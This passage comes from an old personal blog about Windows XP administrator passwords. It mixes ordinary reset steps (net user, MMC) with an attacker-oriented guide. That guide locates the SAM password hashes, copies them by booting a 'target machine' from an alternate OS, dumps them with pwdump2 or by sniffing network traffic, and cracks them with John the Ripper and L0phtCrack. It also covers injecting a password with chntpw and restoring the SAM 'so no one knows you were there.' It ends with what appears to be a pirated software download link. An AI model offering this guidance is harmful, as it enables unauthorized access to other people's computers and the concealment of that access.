/></user_name></p> <p style="font-family: verdana;" align="left"><user_name>Alternatively, you can type the following command: net user <user_name> <new_password>. When you do so, the password changes without prompting you again. This command also enables you to change passwords in a batch file.<br /></new_password></user_name></user_name><br /></p> <ul face="verdana"><li><p align="center">Non-administrators receive a "System error 5 has occurred. Access is denied" error message when they attempt to change the password.</p> </li></ul> <ul face="verdana"><li><p style="margin-bottom: 0in; text-decoration: none;"> <span style="color: rgb(128, 0, 0);">IF YOUR COMPUTER IS RUNNING ON WINDOWS XP SP2 & NTFS FILE FORMAT THEN THERE IS NO SHORTCUT WAY TO BYPASS ADMINISTRATOR PASSWORD.</span></p> </li></ul> <p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;"><br /></p> <p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;"> For utilizing this part you have to know something about NTFS file format & SAM files.</p> <p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;"> <b> NTFS file format</b>: NTFS file format is the last invention of MICROSOFT c</p> <p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;">orporation till now. It is a more secure file system than FAT, FAT16 or FAT32. It can accessed by less number of OS.</p> <p style="text-decoration: none; font-family: verdana;"><b> SAM File</b> - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller. Simple enough wouldn't you say?<br /><br /><br /></p> <p style="text-decoration: none; font-family: verdana;"><b>Some commonly asked questions: </b> </p> <p face="verdana"><b>§ Where do I find the SAM/Hashes?</b><br /><br /></p> <p face="verdana">You can find what you're looking for in several locations on a given machine. </p> <p face="verdana">It can be found on the hard drive in the folder %systemroot%system32config. However this folder is locked to all accounts including Administrator while the machine is running. The only account that can access the SAM file during operation is the "System" account. </p> <p face="verdana"> </p> <ul style="font-family: verdana;"><li> <p>The final location of the SAM or corresponding hashes can be found in the registry. It can be found under HKEY_LOCAL_MACHINESAM. This is also locked to all users, including Administrator, while the machine is in use. </p> </li><li><p>So the three locations of the SAMHashes are:</p> </li><li><p>%systemroot%system32config</p> </li><li><p>%systemroot% epair (but only if rdisk has been run)</p> </li><li><p>In the registry under HKEY_LOCAL_MACHINESAM</p> </li></ul> <p face="verdana"><b>§ Obtaining the SAMPassword Hashes :</b></p> <p style="font-family: verdana;">Now we know where the goods are, and the problem is this... "How do I get my hands on those hashes?" The answer is "One of four ways." </p> <ul style="font-family: verdana;"><li> <p>Probably the easiest way to do this is to boot your target machine to an alternate OS like NTFSDOS or Linux and just copy the SAM from the %systemroot%system32config folder. It's quick, it's easy, and it's effective. You can get a copy of NTFSDOS from Sysinternals(http://www.sysinternals.com) The regular version of NTFSDOS is freeware, which is always nice, but only allows for Read-Only access. </p> </li><li><p>You can also get password hashes by using pwdump2. pwdump uses .DLL injection in order to use the system account to view the password hashes stored in the registry. It then pulls the hashes from the registry and stores them in a handy little text file that you can then import into a password cracking utility like l0phtcrack. </p> </li><li><p>The final way to obtain password hashes is to listen directly to the network traffic as it floats by your computer and grab hashes using the above mentioned l0phtcrack.</p> </li></ul> <p style="font-family: verdana;"><b>§ Cracking Password Hashes:</b> </p> <p style="font-family: verdana;">With the hashes in hand and an eagerness to find out what passwords lie waiting. Let's get cracking. While there are numerous programs available for the use of password cracking I will quickly cover two of the most popular ones. </p> <p style="font-family: verdana;">John the Ripper - John the Ripper is to many, the old standby password cracker. It is command line which makes it nice if you're doing some scripting, and best of all it's free. The only real thing that JtR is lacking is the ability to launch Brute Force attacks against your password file. But look at it this way, even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack. Not bad, not bad at all. </p> <p style="font-family: verdana;">L0phtCrack - Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake. And with a pricetag of $249 for a single user license it sure seems like every one owns it. Boy, @Stake must be </p> <p style="font-family: verdana;">making a killing. :) This is probably the nicest password cracker you will ever see. With the ability to import hashes directly from the registry ala pwdump and dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password". But almost all will fall to L0phtCrack given enough time. </p> <p style="font-family: verdana;"><b>§ Injecting Password Hashes into the SAM:</b></p> <p style="font-family: verdana;">Probably one of my favorite and easiest ways to gain Administrator privileges on a machine, is by injecting password hashes into the SAM file. In order to do this you will need physical access to the machine and a brain larger than a peanut. Using a utility called "chntpw" by Petter Nordhal-Hagen you can inject whatever password you wish into the SAM file of any NT, 2000, or XP machine thereby giving you total control. I would suggest backing up the SAM file first by using an alternate OS. Go in, inject the password of your choosing. Login using your new password. Do what you need to do. Then </p> <p style="font-family: verdana;">restore the original SAM so no one knows you were there. </p> <p style="font-family: verdana;">I know this may seem like a lot to do, but let's face it, a weak password is a cracked password. <span style=""><span style="text-decoration: none;">Dont be afraid the process is not so difficult.</span></span></p> <p style="font-family: verdana;"><b>Direct Boot up Without Typing Password:</b></p> <ul style="font-family: verdana;"><li><p align="left">At a command prompt, type "control userpasswords2" and press Enter to open the Windows 2000-style User Accounts application.</p> </li><li><p align="left"> On the Users tab, clear the Users Must Enter A User Name And Password To Use This Computer check box and then click OK.</p> </li><li><p align="left">In the Automatically Log On dialog box that appears, type the user name and password for the account you want to be logged on each time you start your computer.</p> </li></ul> <p style="font-family: verdana;"><b>Cannot Change the Administrator Password in Control Panel:</b></p> <p style="font-family: verdana;" align="left">After you log on as an administrator to a computer that is not a member of a domain, when you double-click User Accounts in Control Panel to change the password for the built-in Administrator account, the Administrator account may not appear in the list of user accounts. Consequently, you cannot change its password.<br /><br />This behavior can occur because the Administrator account logon option appears only in Safe mode if more than one account is created on the system. The Administrator account is available in Normal mode only if there are no other accounts on the system. To work around this behavior:<br /><br />If you are running Windows XP Home Edition, restart the computer and then use a power user account to log on to the computer in Safe mode.<br /><br /></p> <p style="font-family: verdana;" align="left">If you are running Windows XP Professional, reset the password in the Local Users and Groups snap-in in Microsoft Management Console (MMC):<br /><br />1. Click Start, and then click Run.<br />2. In the Open box, type "mmc" (without the quotation marks), and then click OK to start MMC.<br />3. Start the Local Users and Groups snap-in.<br />4. Under Console Root, expand "Local Users and Groups", and then click Users.<br />5. In the right pane, right-click Administrator, and then click Set Password.<br />6. Click Proceed in the message box that appears.<br />7. Type and confirm the new password in the appropriate boxes, and then click OK.</p><br /><h2 class="posttitle"><a href="http://www.fullandfree.info/software/erd-commander-2005/" rel="bookmark" title="Permanent link to Erd Commander 2005">Erd Commander 2005</a></h2><p style="margin-bottom: 0in; font-family: verdana;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_3u_petKp980/R5yv-MkTPcI/AAAAAAAAALw/FOFRUXOFiQQ/s1600-h/erd-commander-2005.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 230px; height: 173px;" src="http://2.bp.blogspot.com/_3u_petKp980/R5yv-MkTPcI/AAAAAAAAALw/FOFRUXOFiQQ/s320/erd-commander-2005.jpg" alt="" id="BLOGGER_PHOTO_ID_5160192756119977410" border="0" /></a></p> <p style="font-family: verdana;" align="left"><br /></p><br /><p style="font-family: verdana;" align="left"><br /></p><br /><p style="font-family: verdana;" align="left"><br /></p><br /><ul><li>Boots dead systems directly from CD</li><li>Easy, familiar Windows-like interface</li><li>Intuitive Solution Wizard helps you select the right tool to correct your system issue</li><li>Includes Crash Analyzer Wizard to pinpoint the cause of recent system crashes for repair</li><li>Allows complete disk sanitizing/data removal with Disk Wipe utility</li><li>Includes the Locksmith utility to reset lost Administrator passwords</li><li>Includes FileRestore so that you can quickly find and recover deleted files</li><li>Provides access to XP Restore Points on unbootable Windows XP systems</li><li>Detect malware and other applications that may be consuming system resources</li><li>Includes an Internet browser to facilitate downloading needed files and patches</li><li>Compares key info on unbootable systems with that of a working system for diagnosis and troubleshooting</li><li>Automatically identifies and replaces critical system files that have become corrupt</li><li>Allows for formatting and partitioning of disks</li><li>Provides emergency removal capability for faulty hotfixes</li><li>Built-in network access to safely copy data to/from dead systems</li><li>Repair and diagnostic tools located on Start menu</li><li>Repair tools include System Restore tool, System File Repair, Service and Driver Manager, Hotfix Uninstall Wizard, Locksmith, Registry Editor, Explorer, Disk Management, and Command Prompt</li><li>Data recovery tools include Disk Commander and FileRestore</li><li>Diagnostic tools include Crash Analyzer Wizard, System Compare, Autoruns, Event Log Viewer, System Information, TCP/IP Configuration, and Logical volumes utilities</li><li>Compatible with Windows NT, 2000, XP, and Server 2003</li></ul><p style="font-family: verdana;" align="left"><span style="font-weight: bold; color: rgb(255, 102, 102);">Download link::</span> <a href="http://http//www.rapiduploading.com/file/226/Winternals-ERD-Commander-2005-rar.html">http://www.rapiduploading.com/file/226/Winternals-ERD-Commander-2005-rar.html</a></p><p style="font-family: verdana;" align="left"><br /></p><p style="font-family: verdana;" align="left"><br /></p><span style="font-family:verdana;">Hey! thanx for visiting my blog.... </span><p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;" align="left"> who i am? I'm, a student of Electrical Engineer 2<sup>nd</sup> year, Mainak Bhattacharya. </p> <p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;" align="left">visit me at : <a href="http://www.mainakkol.co.nr">www.makdee.coz.in</a><br /></p><p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;" align="left"> NICE SEEING U HERE!</p>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0